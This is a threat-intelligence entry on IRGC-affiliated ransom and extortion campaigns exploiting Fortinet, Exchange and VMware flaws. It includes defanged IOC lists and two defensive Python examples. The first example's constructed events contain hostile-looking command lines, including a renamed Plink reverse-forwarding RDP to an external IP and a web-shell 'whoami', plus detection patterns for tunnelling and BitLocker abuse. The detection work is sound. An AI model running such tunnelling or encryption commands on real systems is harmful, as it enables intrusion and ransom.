Threats Feed | Unknown | Last Updated: 17/02/2026 | Author: Certfa Radar | Publish Date: 14/09/2022

Iranian Cyber Actors Target Western Nations in Ransom and Extortion Campaigns

  • Actor Motivations: Exfiltration, Extortion, Financial Gain
  • Attack Vectors: Vulnerability Exploitation, Cryptojacking, Ransomware
  • Attack Complexity: Medium
  • Threat Risk: High Impact/High Probability

Threat Overview

Cyber actors affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC) have, since at least early 2021, exploited known vulnerabilities in Fortinet FortiOS, Microsoft Exchange and VMware Horizon to compromise entities in the U.S., U.K. and Australia. The vulnerabilities include the FortiOS flaws CVE-2018-13379, CVE-2020-12812 and CVE-2019-5591 and the Microsoft Exchange ProxyShell chain; they were used for initial access, followed by ransom and extortion operations and data exfiltration. Observed activity includes encrypting victim data for ransom, threatening to leak stolen data, and cryptocurrency mining, with impact on law enforcement, transportation, municipal government and aerospace. For command and control, lateral movement and encryption the actors relied on legitimate or publicly available tooling: Fast Reverse Proxy (FRP) and Plink for tunnelling, RDP for lateral movement, and the built-in Windows BitLocker feature to encrypt data. Because none of these is malware in its own right, hash- and domain-based indicators alone are a weak detection basis for this activity.
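The tooling listed above leaves behavioural traces that hash- and domain-based indicators miss once a binary is renamed or rebuilt. The following is an added example, not code from the advisory or from Certfa Radar: a small Python rule set run over constructed process-creation events (host names, PIDs, paths and command lines are made up for the example; the rule names are this example's own). It flags the IIS worker process spawning a shell (the usual ProxyShell web-shell footprint), a Plink-style reverse tunnel that forwards the RDP port regardless of what the binary is called, an FRP client, and BitLocker being turned on from a command shell, while leaving two benign events alone.

```python
"""Behavioural checks for the tooling named above (FRP, Plink, RDP, BitLocker).

Added example: the events below are constructed for illustration and the rule
names are this example's own, not the advisory's."""
import ntpath
import re
from typing import Callable

# Constructed process-creation events, in the shape an EDR or Sysmon event 1
# would give after normalisation (hosts, PIDs and paths are made up).
EVENTS = [
    {"host": "EXCH01", "pid": 4120, "parent": "w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    # Plink renamed to svchost.exe, reverse-forwarding RDP to an external host
    {"host": "EXCH01", "pid": 4188, "parent": "cmd.exe",
     "image": r"C:\Users\Public\svchost.exe",
     "cmdline": "svchost.exe -ssh -N -R 12345:127.0.0.1:3389 -l user -pw p@ss 203.0.113.7"},
    {"host": "FS01", "pid": 980, "parent": "cmd.exe",
     "image": r"C:\ProgramData\frpc.exe",
     "cmdline": "frpc.exe -c frpc.ini"},
    {"host": "FS01", "pid": 1002, "parent": "powershell.exe",
     "image": r"C:\Windows\System32\manage-bde.exe",
     "cmdline": "manage-bde -on D: -RecoveryPassword -UsedSpaceOnly"},
    # Benign: an administrator checking BitLocker status from Explorer
    {"host": "WS07", "pid": 300, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\manage-bde.exe",
     "cmdline": "manage-bde -status"},
    # Benign: the real svchost started by the service control manager
    {"host": "EXCH01", "pid": 5000, "parent": "services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()

def webshell_child(e: dict) -> bool:
    # IIS worker process spawning a shell: the usual footprint of an Exchange web shell.
    return e["parent"].lower() == "w3wp.exe" and image_name(e["image"]) in SHELLS

# "-R <port>:<host>:3389": a reverse forward exposing RDP through the tunnel.
PLINK_REVERSE = re.compile(r"(?:^|\s)-R\s+\d+:[\w.-]+:3389(?:\s|$)")

def plink_rdp_tunnel(e: dict) -> bool:
    # Match on the argument shape, not the file name: the binary is often renamed.
    cmd = e["cmdline"]
    return bool(PLINK_REVERSE.search(cmd)) and ("-pw" in cmd or "-ssh" in cmd or "-N" in cmd.split())

def frp_client(e: dict) -> bool:
    # Either the stock binary name or a reference to an FRP client config file.
    return image_name(e["image"]) in {"frpc.exe", "frps.exe"} or \
        re.search(r"\bfrpc?\.(ini|toml|yaml|yml)\b", e["cmdline"], re.I) is not None

BITLOCKER_ON = re.compile(r"manage-bde(?:\.exe)?\b.*(?:^|\s)-on(?:\s|$)", re.I)

def bitlocker_enabled_from_shell(e: dict) -> bool:
    # Turning BitLocker on from an interactive shell or a web-shell child is what
    # the encryption-for-ransom step looks like; deployment tooling does not do this.
    cmd = e["cmdline"]
    return bool(BITLOCKER_ON.search(cmd) or "enable-bitlocker" in cmd.lower()) \
        and image_name(e["parent"]) in SHELLS | {"w3wp.exe"}

RULES: list[tuple[str, Callable[[dict], bool]]] = [
    ("exchange_webshell_child", webshell_child),
    ("plink_rdp_reverse_tunnel", plink_rdp_tunnel),
    ("frp_client", frp_client),
    ("bitlocker_enable_from_shell", bitlocker_enabled_from_shell),
]

def evaluate(events: list[dict]) -> list[tuple[str, str, int]]:
    """Return (rule, host, pid) for every event that trips a rule."""
    hits = []
    for e in events:
        for name, rule in RULES:
            if rule(e):
                hits.append((name, e["host"], e["pid"]))
    return hits

if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print("ALERT %-28s host=%s pid=%d" % hit)
```

Running the block prints four alerts, one per malicious event, and nothing for the status check or the genuine svchost. The Plink rule is deliberately keyed on the `-R ...:3389` argument shape rather than on `plink.exe`, which is the kind of check that survives a renamed binary; in production these rules would be fed from Sysmon or EDR process events rather than the inline list.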

Detected Targets

Type   | Description                      | Confidence
Sector | Government Agencies and Services | Verified
Sector | Aerospace                        | Verified
Sector | Transportation                   | Verified
Region | Australia                        | Verified
Region | Canada                           | Verified
Region | United Kingdom                   | Verified
Region | United States                    | Verified

Extracted IOCs

Domains (11)

  • aptmirror[.]eu
  • buylap[.]top
  • gupdate[.]us
  • mssync[.]one
  • msupdate[.]top
  • msupdate[.]us
  • newdesk[.]top
  • symantecserver[.]co
  • tcp443[.]org
  • upmirror[.]top
  • winstore[.]us

File hashes, MD5 (15)

  • 0f8b592126cc2be0e9967d21c40806bc
  • 298d41f01009c6d6240bc2dc7b769205
  • 2e1e17a443dc713f13f45a9646fc2179
  • 49c71178fa212012d710f11a0e6d1a30
  • 5b646edb1deb6396082b214a1d93691b
  • 5f098b55f94f5a448ca28904a57c0e58
  • 68f58e442fba50b02130eedfc5fe4e5b
  • 7ac4633bf064ebba9666581b776c548f
  • 7fdc2d007ef0c1946f1f637b87f81590
  • 9a3703f9c532ae2ec3025840fa449d4e
  • bd131ebfc44025a708575587afeebbf3
  • cacb64bdf648444e66c82f5ce61caf4b
  • d2f4647a3749d30a35d5a8faff41765e
  • ee8fd6c565254fe55a104e67cf33eaea
  • f0be699c8aafc41b25a8fc0974cc4582

File hashes, SHA-1 (14)

  • 0f676bc786db3c44cac4d2d22070fb514b4cb64c
  • 226f0fbb80f7a061947c982ccf33ad65ac03280f
  • 24ed561a1ddbecd170acf1797723e5d3c51c2f5d
  • 27102b416ef5df186bd8b35190c2a4cc4e2fbf37
  • 3a6431169073d61748829c31a9da29123dd61da8
  • 3da45558d8098eb41ed7db5115af5a2c61c543af
  • 524443dd226173d8ba458133b0a4084a172393ef
  • 6bae2d45bbd8c4b0a59ba08892692fe86e596154
  • 6ca62f4244994b5fbb8a46bdfe62aa1c958cebbd
  • 763ca462b2e9821697e63aa48a1734b10d3765ee
  • 76dd6560782b13af3f44286483e157848efc0a4e
  • 8b23b14d8ec4712734a5f6261aed40942c9e0f68
  • 8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee
  • e75bfc0dd779d9d8ac02798b090989c2f95850dc

File hashes, SHA-256 (13)

  • 12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a
  • 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e
  • 17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f
  • 559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e
  • 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0
  • 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26
  • 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b
  • 8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9
  • b04b97e7431925097b3ca4841b8941397b0b88796da512986327ff66426544ca
  • b8a472f219658a28556bab4d6d109fdf3433b5233a765084c70214c973becbbd
  • bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea
  • c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837
  • d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7

IP addresses (10)

  • 104[.]168.117.149
  • 107[.]173.231.114
  • 144[.]76.186.88
  • 148[.]251.71.182
  • 172[.]245.26.118
  • 185[.]141.212.131
  • 198[.]12.65.175
  • 198[.]144.189.74
  • 54[.]39.78.148
  • 95[.]217.193.86

Tip: 63 related IOCs (10 IP, 11 domain, 0 URL, 0 email, 42 file hash) to this threat have been found.
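The list above is defanged and mixes domains, IPv4 addresses and three hash lengths, so it cannot be dropped into a search as published. The following added example (not tooling from Certfa Radar or the advisory) refangs a subset of the indicators copied from the list, classifies each one by type, and hunts a handful of constructed DNS, proxy and EDR log lines for them. Hashes and addresses match only as whole tokens, so 148.251.71.18 is not mistaken for 148.251.71.182, and a listed domain matches its subdomains as well as itself, which is how these domains are normally seen in DNS logs.

```python
"""Refang, classify and hunt the indicators listed above in local telemetry.

Added example, not tooling from Certfa Radar: the IOC subset is copied from the
list above; the log lines are constructed for illustration."""
import ipaddress
import re

# Subset of the published indicators, kept in their defanged form.
DEFANGED_IOCS = [
    "aptmirror[.]eu", "msupdate[.]top", "symantecserver[.]co", "tcp443[.]org",
    "148[.]251.71.182", "198[.]144.189.74",
    "5f098b55f94f5a448ca28904a57c0e58",                                    # MD5
    "0f676bc786db3c44cac4d2d22070fb514b4cb64c",                            # SHA-1
    "1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e",    # SHA-256
]

# Constructed log lines (DNS, proxy and EDR), not real telemetry.
LOG_LINES = [
    "2021-10-11T08:14:02Z dns client=10.0.0.12 query=update.msupdate.top type=A",
    "2021-10-11T08:14:05Z proxy src=10.0.0.12 dst=148.251.71.182:443 action=allow bytes=51200",
    r"2021-10-11T08:20:19Z edr host=EXCH01 image=C:\Users\Public\frpc.exe md5=5F098B55F94F5A448CA28904A57C0E58",
    "2021-10-11T08:21:00Z dns client=10.0.0.13 query=login.microsoftonline.com type=A",
    "2021-10-11T08:22:10Z proxy src=10.0.0.14 dst=148.251.71.18:443 action=allow bytes=900",
]

HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}
HEX = re.compile(r"^[0-9a-f]+$")
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
TOKEN = re.compile(r"[a-z0-9][a-z0-9.-]*")   # hostnames, IPs and hex digests

def refang(ioc: str) -> str:
    """Undo the usual defanging so the value can be compared with live data."""
    v = ioc.strip().lower()
    for old, new in (("[.]", "."), ("(.)", "."), ("[dot]", "."), ("hxxp", "http")):
        v = v.replace(old, new)
    return v

def classify(ioc: str) -> str:
    """Type of a (defanged or plain) indicator: md5/sha1/sha256/ip/domain/unknown."""
    v = refang(ioc)
    if HEX.match(v) and len(v) in HASH_LENGTHS:
        return HASH_LENGTHS[len(v)]
    try:
        ipaddress.ip_address(v)
        return "ip"
    except ValueError:
        pass
    return "domain" if DOMAIN.match(v) else "unknown"

def hunt(lines, iocs):
    """Return (line_no, type, ioc) for each line that contains an indicator.

    Hashes and IPs must match a whole token; domains also match subdomains."""
    by_type = {}
    for ioc in iocs:
        by_type.setdefault(classify(ioc), set()).add(refang(ioc))
    domains = by_type.get("domain", set())
    exact = set().union(*(by_type.get(t, set()) for t in ("ip", "md5", "sha1", "sha256")))
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in TOKEN.findall(line.lower()):
            tok = tok.rstrip(".")
            if tok in exact:
                hits.append((n, classify(tok), tok))
            else:
                for d in domains:
                    if tok == d or tok.endswith("." + d):
                        hits.append((n, "domain", d))
    return hits

if __name__ == "__main__":
    for hit in hunt(LOG_LINES, DEFANGED_IOCS):
        print("line %d: %s %s" % hit)
```

Run as a script it reports three hits (the subdomain lookup on line 1, the outbound connection on line 2 and the MD5 on line 3) and nothing for the near-miss address on line 5. For a real hunt, replace `LOG_LINES` with a file iterator and `DEFANGED_IOCS` with the full list from this page; classification by hash length means the same code serves all 42 hashes without telling it which is which.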

Overlaps

Ballistic Bobcat | Ballistic Bobcat Exploits Microsoft Exchange Vulnerabilities to Compromise 34 Organizations

Source: ESET - September 2023

Detection (one case): 198[.]144.189.74

APT35 | APT35's Exploitation of Microsoft Exchange: Targeting Europe, Middle East, and North America

Source: AttackIQ - August 2023

Detection (16 cases): 107[.]173.231.114, 148[.]251.71.182, 0f676bc786db3c44cac4d2d22070fb514b4cb64c, 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e, 27102b416ef5df186bd8b35190c2a4cc4e2fbf37, 3a6431169073d61748829c31a9da29123dd61da8, 559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e, 5f098b55f94f5a448ca28904a57c0e58, 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0, 6bae2d45bbd8c4b0a59ba08892692fe86e596154, 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b, 8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee, 9a3703f9c532ae2ec3025840fa449d4e, cacb64bdf648444e66c82f5ce61caf4b, d2f4647a3749d30a35d5a8faff41765e, f0be699c8aafc41b25a8fc0974cc4582

Cobalt Mirage | Unveiling the Actors behind COBALT MIRAGE: A Ransomware Incident Analysis

Source: Secureworks - September 2022

Detection (nine cases): 104[.]168.117.149, 148[.]251.71.182, 172[.]245.26.118, gupdate[.]us, mssync[.]one, msupdate[.]top, newdesk[.]top, symantecserver[.]co, upmirror[.]top

Phosphorus | Stealth in the System: PHOSPHORUS Exploits Exchange Server in Infrastructure Sector Attack

Source: Deep Instinct - June 2022

Detection (17 cases): 107[.]173.231.114, 148[.]251.71.182, 172[.]245.26.118, 198[.]144.189.74, 12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a, 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e, 17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f, 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26, 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b, 8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9, b04b97e7431925097b3ca4841b8941397b0b88796da512986327ff66426544ca, b8a472f219658a28556bab4d6d109fdf3433b5233a765084c70214c973becbbd, aptmirror[.]eu, msupdate[.]us, newdesk[.]top, symantecserver[.]co, tcp443[.]org

Cobalt Mirage | COBALT MIRAGE's Exploits: Targeting Israeli and Western Organizations

Source: Secureworks - May 2022

Detection (15 cases): 107[.]173.231.114, 198[.]12.65.175, 0f8b592126cc2be0e9967d21c40806bc, 27102b416ef5df186bd8b35190c2a4cc4e2fbf37, 3da45558d8098eb41ed7db5115af5a2c61c543af, 5f098b55f94f5a448ca28904a57c0e58, 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0, 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26, aptmirror[.]eu, gupdate[.]us, msupdate[.]us, newdesk[.]top, symantecserver[.]co, tcp443[.]org, winstore[.]us

Phosphorus | PowerLess Backdoor: Analyzing the Phosphorus Group's Cyber Espionage Tool

Source: Cybereason - February 2022

Detection (one case): 148[.]251.71.182

APT35 | CharmPower: APT35's Modular Toolset Exploits Log4j Vulnerability

Source: Check Point - January 2022

Detection (one case): 148[.]251.71.182

Phosphorus | Iranian-backed PHOSPHORUS Exploits Microsoft Exchange Vulnerabilities for Data Encryption

Source: The DFIR Report - November 2021

Detection (two cases): 148[.]251.71.182, 198[.]144.189.74

Phosphorus | Automated Scripts Used in Microsoft Exchange ProxyShell Attack By PHOSPHORUS

Source: The DFIR Report - March 2021

Detection (16 cases): 107[.]173.231.114, 148[.]251.71.182, 0f676bc786db3c44cac4d2d22070fb514b4cb64c, 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e, 27102b416ef5df186bd8b35190c2a4cc4e2fbf37, 3a6431169073d61748829c31a9da29123dd61da8, 559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e, 5f098b55f94f5a448ca28904a57c0e58, 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0, 6bae2d45bbd8c4b0a59ba08892692fe86e596154, 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b, 8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee, 9a3703f9c532ae2ec3025840fa449d4e, cacb64bdf648444e66c82f5ce61caf4b, d2f4647a3749d30a35d5a8faff41765e, f0be699c8aafc41b25a8fc0974cc4582

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding the IRGC-Affiliated Cyber Threat

Iranian government-sponsored actors have been breaking into the networks of a wide range of organizations by finding and exploiting known vulnerabilities in widely deployed software. Once inside, they steal data, encrypt systems to demand a ransom, or use the compromised hardware to mine cryptocurrency.

The activity is attributed to groups affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). One entity named in the report is an Iranian company called "Afkar System Yazd Company."

The main goals appear to be financial gain and disruption. The actors demand payment to decrypt data they have encrypted (ransom), threaten to leak stolen information (extortion), or mine cryptocurrency at the victim's expense in electricity and hardware.

The targeting is broad and includes critical infrastructure and government services. Victims have included U.S. police departments, transportation companies, aerospace firms and municipal governments, as well as organizations in the U.K. and Australia.

The actors scan the internet for organizations that have not patched their software, looking specifically for known vulnerabilities in Microsoft Exchange, Fortinet FortiOS and VMware Horizon. They exploit those to get in, then use other tools (tunnelling utilities such as Plink and FRP, and RDP) to move through the network, and BitLocker to encrypt files.

These organizations hold sensitive data or provide essential services (such as transportation or policing), which makes them more likely to feel pressured to pay a ransom to get their systems back online quickly.

The most important step is to patch immediately, especially the products named in the report (Microsoft Exchange, Fortinet FortiOS, VMware Horizon). Organizations should also keep offline backups of their data so they can restore it if their primary systems are encrypted.

The threat is ongoing: the report indicates that these actors have been actively scanning for and exploiting these vulnerabilities since early 2021 across multiple countries and industries.